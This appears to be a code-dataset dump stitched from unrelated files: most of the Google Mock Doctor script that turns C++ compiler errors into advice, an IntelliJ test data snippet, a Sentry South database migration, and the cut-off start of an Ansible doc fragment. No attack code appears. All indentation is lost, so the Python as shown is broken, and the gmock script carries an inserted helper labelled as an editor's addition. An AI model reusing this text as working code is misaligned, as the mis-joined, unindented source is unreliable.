"""Diagnoses the NRS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'(instantiated from here\n.'
r'*gmock.*actions\.h.*error: void value not ignored)'
r'|(error: control reaches end of non-void function)')
clang_regex1 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'Result\' \(aka \'(?P<return_type>.*)\'\) '
r'with an rvalue of type \'void\'')
clang_regex2 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'(?P<return_type>.*)\' '
r'with an rvalue of type \'void\'')
diagnosis = """
You are using an action that returns void, but it needs to return
%(return_type)s. Please tell it *what* to return. Perhaps you can use
the pattern DoAll(some_action, Return(some_value))?"""
return _GenericDiagnoser(
'NRS',
'Need to Return Something',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _NeedToReturnNothingDiagnoser(msg):
"""Diagnoses the NRN disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: instantiation of '
r'\'testing::internal::ReturnAction<R>::Impl<F>::value_\' '
r'as type \'void\'')
clang_regex1 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(?P<return_type>.*)>'
r'::operator Action<void \(.*\)>\' requested here')
clang_regex2 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::DoBothAction<.*>'
r'::operator Action<(?P<return_type>.*) \(.*\)>\' '
r'requested here')
diagnosis = """
You are using an action that returns %(return_type)s, but it needs to return
void. Please use a void-returning action instead.
All actions but the last in DoAll(...) must return void. Perhaps you need
to re-arrange the order of actions in a DoAll(), if you are using one?"""
return _GenericDiagnoser(
'NRN',
'Need to Return Nothing',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _IncompleteByReferenceArgumentDiagnoser(msg):
"""Diagnoses the IBRA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to incomplete type \'(?P<type>.*)\'')
clang_regex = (r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to an incomplete type '
r'\'(?P<type>.*)( const)?\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of member function '
r'\'testing::internal2::TypeWithoutFormatter<.*>::'
r'PrintValue\' requested here')
diagnosis = """
In order to mock this function, Google Mock needs to see the definition
of type "%(type)s" - declaration alone is not enough. Either #include
the header that defines it, or change the argument to be passed
by pointer."""
return _GenericDiagnoser('IBRA', 'Incomplete By-Reference Argument Type',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionMatcherDiagnoser(msg):
"""Diagnoses the OFM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly\(<unresolved overloaded function type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly')
diagnosis = """
The argument you gave to Truly() is an overloaded function. Please tell
your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool Foo(int n);
you should write
Truly(static_cast<bool (*)(int n)>(Foo))"""
return _GenericDiagnoser('OFM', 'Overloaded Function Matcher',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionActionDiagnoser(msg):
"""Diagnoses the OFA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for call to '
r'\'Invoke\(<unresolved overloaded function type>')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching '
r'function for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-\w+-actions\.h:\d+:\d+:\s+'
r'note: candidate template ignored:\s+'
r'couldn\'t infer template argument \'FunctionImpl\'')
diagnosis = """
Function you are passing to Invoke is overloaded. Please tell your compiler
which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool MyFunction(int n, double x);
you should write something like
Invoke(static_cast<bool (*)(int n, double x)>(MyFunction))"""
return _GenericDiagnoser('OFA', 'Overloaded Function Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedMethodActionDiagnoser(msg):
"""Diagnoses the OMA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Invoke\(.+, <unresolved overloaded function '
r'type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function '
r'for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-\w+-actions\.h:\d+:\d+: '
r'note: candidate function template not viable: '
r'requires .*, but 2 (arguments )?were provided')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _MockObjectPointerDiagnoser(msg):
"""Diagnoses the MOP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: request for member '
r'\'gmock_(?P<method>.+)\' in \'(?P<mock_object>.+)\', '
r'which is of non-class type \'(.*::)*(?P<class_name>.+)\*\'')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: member reference type '
r'\'(?P<class_name>.*?) *\' is a pointer; '
r'maybe you meant to use \'->\'\?')
diagnosis = """
The first argument to ON_CALL() and EXPECT_CALL() must be a mock *object*,
not a *pointer* to it. Please write '*(%(mock_object)s)' instead of
'%(mock_object)s' as your first argument.
For example, given the mock class:
class %(class_name)s : public ... {
...
MOCK_METHOD0(%(method)s, ...);
};
and the following mock instance:
%(class_name)s* mock_ptr = ...
you should use the EXPECT_CALL like this:
EXPECT_CALL(*mock_ptr, %(method)s(...));"""
return _GenericDiagnoser(
'MOP',
'Mock Object Pointer',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis % {'mock_object': 'mock_object',
'method': 'method',
'class_name': '%(class_name)s'})],
msg)
def _NeedToUseSymbolDiagnoser(msg):
"""Diagnoses the NUS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: \'(?P<symbol>.+)\' '
r'(was not declared in this scope|has not been declared)')
clang_regex = (_CLANG_FILE_LINE_RE +
r'error: (use of undeclared identifier|unknown type name|'
r'no template named) \'(?P<symbol>[^\']+)\'')
diagnosis = """
'%(symbol)s' is defined by Google Mock in the testing namespace.
Did you forget to write
using testing::%(symbol)s;
?"""
for m in (list(_FindAllMatches(gcc_regex, msg)) +
list(_FindAllMatches(clang_regex, msg))):
symbol = m.groupdict()['symbol']
if symbol in _COMMON_GMOCK_SYMBOLS:
yield ('NUS', 'Need to Use Symbol', diagnosis % m.groupdict())
def _NeedToUseReturnNullDiagnoser(msg):
"""Diagnoses the NRNULL disease, given the error messages by the compiler."""
gcc_regex = ('instantiated from \'testing::internal::ReturnAction<R>'
'::operator testing::Action<Func>\(\) const.*\n' +
_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*error: no matching function for call to \'ImplicitCast_\('
r'(:?long )?int&\)')
clang_regex = (r'\bgmock-actions.h:.* error: no matching function for '
r'call to \'ImplicitCast_\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(int|long)>::operator '
r'Action<(?P<type>.*)\(\)>\' requested here')
diagnosis = """
You are probably calling Return(NULL) and the compiler isn't sure how to turn
NULL into %(type)s. Use ReturnNull() instead.
Note: the line number may be off; please fix all instances of Return(NULL)."""
return _GenericDiagnoser(
'NRNULL', 'Need to use ReturnNull',
[(clang_regex, diagnosis),
(gcc_regex, diagnosis % {'type': 'the right type'})],
msg)
def _TypeInTemplatedBaseDiagnoser(msg):
"""Diagnoses the TTB disease, given the error messages by the compiler."""
# This version works when the type is used as the mock function's return
# type.
gcc_4_3_1_regex_type_in_retval = (
r'In member function \'int .*\n' + _GCC_FILE_LINE_RE +
r'error: a function call cannot appear in a constant-expression')
gcc_4_4_0_regex_type_in_retval = (
r'error: a function call cannot appear in a constant-expression'
+ _GCC_FILE_LINE_RE + r'error: template argument 1 is invalid\n')
# This version works when the type is used as the mock function's sole
# parameter type.
gcc_regex_type_of_sole_param = (
_GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n')
# This version works when the type is used as a parameter of a mock
# function that has multiple parameters.
gcc_regex_type_of_a_param = (
r'error: expected `;\' before \'::\' token\n'
+ _GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n'
r'.*error: \'.+\' was not declared in this scope')
clang_regex_type_of_retval_or_sole_param = (
_CLANG_FILE_LINE_RE +
r'error: use of undeclared identifier \'(?P<type>.*)\'\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):\d+: error: '
r'non-friend class member \'Result\' cannot have a qualified name'
)
clang_regex_type_of_a_param = (
_CLANG_FILE_LINE_RE +
r'error: C\+\+ requires a type specifier for all declarations\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: '
r'C\+\+ requires a type specifier for all declarations'
)
clang_regex_unknown_type = (
_CLANG_FILE_LINE_RE +
r'error: unknown type name \'(?P<type>[^\']+)\''
)
diagnosis = """
In a mock class template, types or typedefs defined in the base class
template are *not* automatically visible. This is how C++ works. Before
you can use a type or typedef named %(type)s defined in base class Base<T>, you
need to make it visible. One way to do it is:
typedef typename Base<T>::%(type)s %(type)s;"""
for diag in _GenericDiagnoser(
'TTB', 'Type in Template Base',
[(gcc_4_3_1_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_4_4_0_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_regex_type_of_sole_param, diagnosis),
(gcc_regex_type_of_a_param, diagnosis),
(clang_regex_type_of_retval_or_sole_param, diagnosis),
(clang_regex_type_of_a_param, diagnosis % {'type': 'Foo'})],
msg):
yield diag
# Avoid overlap with the NUS pattern.
for m in _FindAllMatches(clang_regex_unknown_type, msg):
type_ = m.groupdict()['type']
if type_ not in _COMMON_GMOCK_SYMBOLS:
yield ('TTB', 'Type in Template Base', diagnosis % m.groupdict())
def _WrongMockMethodMacroDiagnoser(msg):
"""Diagnoses the WMM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'.*this_method_does_not_take_(?P<wrong_args>\d+)_argument.*\n'
r'.*\n'
r'.*candidates are.*FunctionMocker<[^>]+A(?P<args>\d+)\)>')
clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'error:.*array.*negative.*r?\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: too few arguments '
r'to function call, expected (?P<args>\d+), '
r'have (?P<wrong_args>\d+)')
diagnosis = """
You are using MOCK_METHOD%(wrong_args)s to define a mock method that has
%(args)s arguments. Use MOCK_METHOD%(args)s (or MOCK_CONST_METHOD%(args)s,
MOCK_METHOD%(args)s_T, MOCK_CONST_METHOD%(args)s_T as appropriate) instead."""
return _GenericDiagnoser('WMM', 'Wrong MOCK_METHODn Macro',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _WrongParenPositionDiagnoser(msg):
"""Diagnoses the WPP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'error:.*testing::internal::MockSpec<.* has no member named \''
r'(?P<method>\w+)\'')
clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'error: no member named \'(?P<method>\w+)\' in '
r'\'testing::internal::MockSpec<.*>\'')
diagnosis = """
The closing parenthesis of ON_CALL or EXPECT_CALL should be *before*
".%(method)s". For example, you should write:
EXPECT_CALL(my_mock, Foo(_)).%(method)s(...);
instead of:
EXPECT_CALL(my_mock, Foo(_).%(method)s(...));"""
return _GenericDiagnoser('WPP', 'Wrong Parenthesis Position',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
_DIAGNOSERS = [
_IncompleteByReferenceArgumentDiagnoser,
_MockObjectPointerDiagnoser,
_NeedToReturnNothingDiagnoser,
_NeedToReturnReferenceDiagnoser,
_NeedToReturnSomethingDiagnoser,
_NeedToUseReturnNullDiagnoser,
_NeedToUseSymbolDiagnoser,
_OverloadedFunctionActionDiagnoser,
_OverloadedFunctionMatcherDiagnoser,
_OverloadedMethodActionDiagnoser,
_TypeInTemplatedBaseDiagnoser,
_WrongMockMethodMacroDiagnoser,
_WrongParenPositionDiagnoser,
]
def Diagnose(msg):
"""Generates all possible diagnoses given the compiler error message."""
msg = re.sub(r'\x1b\[[^m]*m', '', msg) # Strips all color formatting.
# Assuming the string is using the UTF-8 encoding, replaces the left and
# the right single quote characters with apostrophes.
msg = re.sub(r'(\xe2\x80\x98|\xe2\x80\x99)', "'", msg)
diagnoses = []
for diagnoser in _DIAGNOSERS:
for diag in diagnoser(msg):
diagnosis = '[%s - %s]\n%s' % diag
if not diagnosis in diagnoses:
diagnoses.append(diagnosis)
return diagnoses
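def _DiagnoseFile(path):
  # Editor's illustrative helper, not part of the original script: runs the
  # diagnosers over a saved compiler log instead of reading from stdin.
  with open(path) as f:
    return Diagnose(f.read())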
def main():
print ('Google Mock Doctor v%s - '
'diagnoses problems in code using Google Mock.' % _VERSION)
if sys.stdin.isatty():
print ('Please copy and paste the compiler errors here. Press c-D when '
'you are done:')
else:
print 'Waiting for compiler errors on stdin . . .'
msg = sys.stdin.read().strip()
diagnoses = Diagnose(msg)
count = len(diagnoses)
if not count:
print ("""
Your compiler complained:
8<------------------------------------------------------------
%s
------------------------------------------------------------>8
Uh-oh, I'm not smart enough to figure out what the problem is. :-(
However...
If you send your source code and the compiler's error messages to
%s, you can be helped and I can get smarter --
win-win for us!""" % (msg, _EMAIL))
else:
print '------------------------------------------------------------'
print 'Your code appears to have the following',
if count > 1:
print '%s diseases:' % (count,)
else:
print 'disease:'
i = 0
for d in diagnoses:
i += 1
if count > 1:
print '\n#%s:' % (i,)
print d
print ("""
How did I do? If you think I'm wrong or unhelpful, please send your
source code and the compiler's error messages to %s.
Then you can be helped and I can get smarter -- I promise I won't be upset!""" %
_EMAIL)
if __name__ == '__main__':
main()
|
caot/intellij-community | refs/heads/master | python/testData/quickFixes/PyMakeFunctionFromMethodQuickFixTest/usageSelf_after.py | 75 | def method2():
print 1
class A():
def method(self):
method2()
|
1tush/sentry | refs/heads/master | src/sentry/migrations/0042_auto__add_projectcountbyminute__add_unique_projectcountbyminute_projec.py | 36 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProjectCountByMinute'
db.create_table('sentry_projectcountbyminute', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'], null=True)),
('date', self.gf('django.db.models.fields.DateTimeField')()),
('times_seen', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
('time_spent_total', self.gf('django.db.models.fields.FloatField')(default=0)),
('time_spent_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal('sentry', ['ProjectCountByMinute'])
# Adding unique constraint on 'ProjectCountByMinute', fields ['project', 'date']
db.create_unique('sentry_projectcountbyminute', ['project_id', 'date'])
def backwards(self, orm):
# Removing unique constraint on 'ProjectCountByMinute', fields ['project', 'date']
db.delete_unique('sentry_projectcountbyminute', ['project_id', 'date'])
# Deleting model 'ProjectCountByMinute'
db.delete_table('sentry_projectcountbyminute')
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_project_set'", 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
|
tersmitten/ansible | refs/heads/devel | lib/ansible/plugins/doc_fragments/aruba.py | 44 | # -*- coding: utf-8 -*-
# Copyright: (c) 2017, James Mighion <@jmighion>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = r'''
options:
provider:
description:
- A dict object containing connection details.
suboptions:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
